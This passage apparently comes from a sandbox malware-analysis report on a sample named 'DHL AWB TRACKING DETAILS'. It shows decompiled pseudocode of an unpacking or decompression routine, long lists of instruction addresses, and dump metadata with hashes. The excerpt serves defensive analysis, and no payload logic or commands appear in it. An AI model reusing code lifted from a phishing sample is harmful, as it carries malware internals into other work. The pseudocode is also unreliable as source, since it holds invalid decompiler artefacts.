											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                    0x00000000
                    0x00406682
                    0x00406682
                    0x00406686
                    0x004066ab
                    0x004066b5
                    0x00000000
                    0x00406688
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406695
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00406776
                    0x00406776
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00406734
                    0x00406734
                    0x00406734
                    0x00405ed0
                    0x00405ed0
                    0x00405ed0
                    0x00405ed9
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x00000000
                    0x00405eea
                    0x00000000
                    0x00000000
                    0x00405ef3
                    0x00405ef6
                    0x00405ef9
                    0x00405efd
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f06
                    0x00405f08
                    0x00405f09
                    0x00405f0c
                    0x00405f0e
                    0x00405f0f
                    0x00405f11
                    0x00405f14
                    0x00405f19
                    0x00405f1e
                    0x00405f27
                    0x00405f3a
                    0x00405f3d
                    0x00405f49
                    0x00405f71
                    0x00405f73
                    0x00405f81
                    0x00405f81
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f75
                    0x00405f75
                    0x00405f78
                    0x00405f79
                    0x00405f79
                    0x00000000
                    0x00405f75
                    0x00405f4f
                    0x00405f54
                    0x00405f54
                    0x00405f5d
                    0x00405f65
                    0x00405f68
                    0x00000000
                    0x00405f6e
                    0x00405f6e
                    0x00000000
                    0x00405f6e
                    0x00000000
                    0x00405f8b
                    0x00405f8b
                    0x00405f8f
                    0x0040683b
                    0x00000000
                    0x0040683b
                    0x00405f98
                    0x00405fa8
                    0x00405fab
                    0x00405fae
                    0x00405fae
                    0x00405fae
                    0x00405fb1
                    0x00405fb5
                    0x00000000
                    0x00000000
                    0x00405fb7
                    0x00405fbd
                    0x00405fe7
                    0x00405fed
                    0x00405ff4
                    0x00000000
                    0x00405ff4
                    0x00405fc3
                    0x00405fc6
                    0x00405fcb
                    0x00405fcb
                    0x00405fd6
                    0x00405fde
                    0x00405fe1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406026
                    0x0040602c
                    0x0040602f
                    0x0040603c
                    0x00406044
                    0x00000000
                    0x00000000
                    0x00405ffb
                    0x00405ffb
                    0x00405fff
                    0x0040684a
                    0x00000000
                    0x0040684a
                    0x0040600b
                    0x00406016
                    0x00406016
                    0x00406016
                    0x00406019
                    0x0040601c
                    0x0040601f
                    0x00406024
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406709
                    0x0040670d
                    0x004068bc
                    0x00000000
                    0x004068bc
                    0x00406719
                    0x00406720
                    0x00406728
                    0x0040672b
                    0x0040672e
                    0x0040672e
                    0x00000000
                    0x00000000
                    0x0040604c
                    0x0040604e
                    0x00406051
                    0x004060c2
                    0x004060c5
                    0x004060c8
                    0x004060cf
                    0x004060d9
                    0x00000000
                    0x004060d9
                    0x00406053
                    0x00406057
                    0x0040605a
                    0x0040605c
                    0x0040605f
                    0x00406062
                    0x00406064
                    0x00406067
                    0x00406069
                    0x0040606e
                    0x00406071
                    0x00406074
                    0x00406078
                    0x0040607f
                    0x00406082
                    0x00406089
                    0x0040608d
                    0x00406095
                    0x00406095
                    0x00406095
                    0x0040608f
                    0x0040608f
                    0x0040608f
                    0x00406084
                    0x00406084
                    0x00406084
                    0x00406099
                    0x0040609c
                    0x004060ba
                    0x004060bc
                    0x00000000
                    0x0040609e
                    0x0040609e
                    0x004060a1
                    0x004060a4
                    0x004060a7
                    0x004060a9
                    0x004060a9
                    0x004060a9
                    0x004060ac
                    0x004060af
                    0x004060b1
                    0x004060b2
                    0x004060b5
                    0x00000000
                    0x004060b5
                    0x00000000
                    0x004062eb
                    0x004062ef
                    0x0040630d
                    0x00406310
                    0x00406317
                    0x0040631a
                    0x0040631d
                    0x00406320
                    0x00406323
                    0x00406326
                    0x00406328
                    0x0040632f
                    0x00406330
                    0x00406332
                    0x00406335
                    0x00406338
                    0x0040633b
                    0x0040633b
                    0x00406340
                    0x00000000
                    0x00406340
                    0x004062f1
                    0x004062f4
                    0x004062f7
                    0x00406301
                    0x00000000
                    0x00000000
                    0x00406355
                    0x00406359
                    0x0040637c
                    0x0040637f
                    0x00406382
                    0x0040638c
                    0x0040635b
                    0x0040635b
                    0x0040635e
                    0x00406361
                    0x00406364
                    0x00406371
                    0x00406374
                    0x00406374
                    0x00000000
                    0x00000000
                    0x00406398
                    0x0040639c
                    0x00000000
                    0x00000000
                    0x004063a2
                    0x004063a6
                    0x00000000
                    0x00000000
                    0x004063ac
                    0x004063ae
                    0x004063b2
                    0x004063b2
                    0x004063b5
                    0x004063b9
                    0x00000000
                    0x00000000
                    0x00406409
                    0x0040640d
                    0x00406414
                    0x00406417
                    0x0040641a
                    0x00406424
                    0x00000000
                    0x00406424
                    0x0040640f
                    0x00000000
                    0x00000000
                    0x00406430
                    0x00406434
                    0x0040643b
                    0x0040643e
                    0x00406441
                    0x00406436
                    0x00406436
                    0x00406436
                    0x00406444
                    0x00406447
                    0x0040644a
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00406453
                    0x00406453
                    0x00406456
                    0x0040645d
                    0x00406462
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00406343
                    0x00406343
                    0x00406346
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00000000
                    0x0040676f
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00406734
                    0x00406734
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x00000000
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x004068d2
                    0x004068d8
                    0x004068da
                    0x004068e1
                    0x004068e3
                    0x004068ea
                    0x004068ee
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00406734
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00406811
                    0x00000000
                    0x00406686

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                    • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                    • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                    • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406398 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
